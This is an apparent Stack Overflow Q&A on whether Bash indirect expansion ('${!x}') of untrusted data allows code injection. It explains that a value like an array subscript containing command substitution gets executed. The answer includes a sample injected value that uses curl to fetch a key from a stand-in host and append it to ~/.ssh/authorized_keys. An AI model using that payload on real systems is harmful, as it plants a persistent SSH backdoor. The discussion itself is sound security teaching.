# Safety considerations for "${!x}" indirect expansion in Bash

Tags: bash

Suppose I have a variable, says `x`, that contains unknown, arbitrary data.

Is the following indirect expansion at risk of code injection or other forms of exploits?

```
ARBITRARY_COMMAND "${!x}"
```

I know there are cases where the way `x` is assigned for useful real-life scenarios may by itself introduce risks and need to be properly controlled or sanitized, but I am assuming here that `x` has been initialized in a a way that makes no guarantee as to its value, yet is not exposed to exploits up to the expansion shown above.

Comment: I already gave you this: `x='a[$(ls>&2)]'`.

Comment: I thought this applied to the assignment that created the equivalent of "x", not to the expansion itself.  My mistake.

Comment: @gniourf_gniourf What is that?

Comment: @123: when expanding `${!x}`, Bash will expand `${a[$(ls>&2)]}`, which is an array expansion, so the term inside the array key, namely `$(ls>&2)`, will be expanded... and this will execute `ls` (with output to stderr so that we can all observe that `ls` is indeed executed).

Comment: @gniourf_gniourf Ahh right,  sub shells could be run via  indirect expansion, cheers.

Comment: Practice safe indirect expansion by know the source of `x` before you expand it.

Comment: @dawg Sure, I agree, and I do that in my own scripts, but it is good knowing what can happen if you don't, and I would not want to recommend other people not to do something and then not being able to explain why.

Comment: @gniourf_gniourf: Great example and explanation - why don't you write it up as an answer?

Answer (score 3):

In short: YES, any automatic expansion of unknown data is potentially hazardous.

Answer by [gniourf_gniourf](https://stackoverflow.com/users/1815797/gniourf-gniourf):

> `x='a[$(ls>&2)]'`
>
> when expanding `${!x}`, Bash will expand `${a[$(ls>&2)]}`, which is an
>   array expansion, so the term inside the array key, namely `$(ls>&2)`,
>   will be expanded... and this will execute `ls` (with output to stderr so
>   that we can all observe that ls is indeed executed).

Instead of `ls` you could, for example, do:

```
x='a[$(curl -s bad.us/pubkey >> ~/.ssh/authorized_keys)]'
```

Which when evaluated by `${!x}` would append a potentially unfriendly public key to your authorized_keys file, which could allow an unfriendly person to ssh into your account.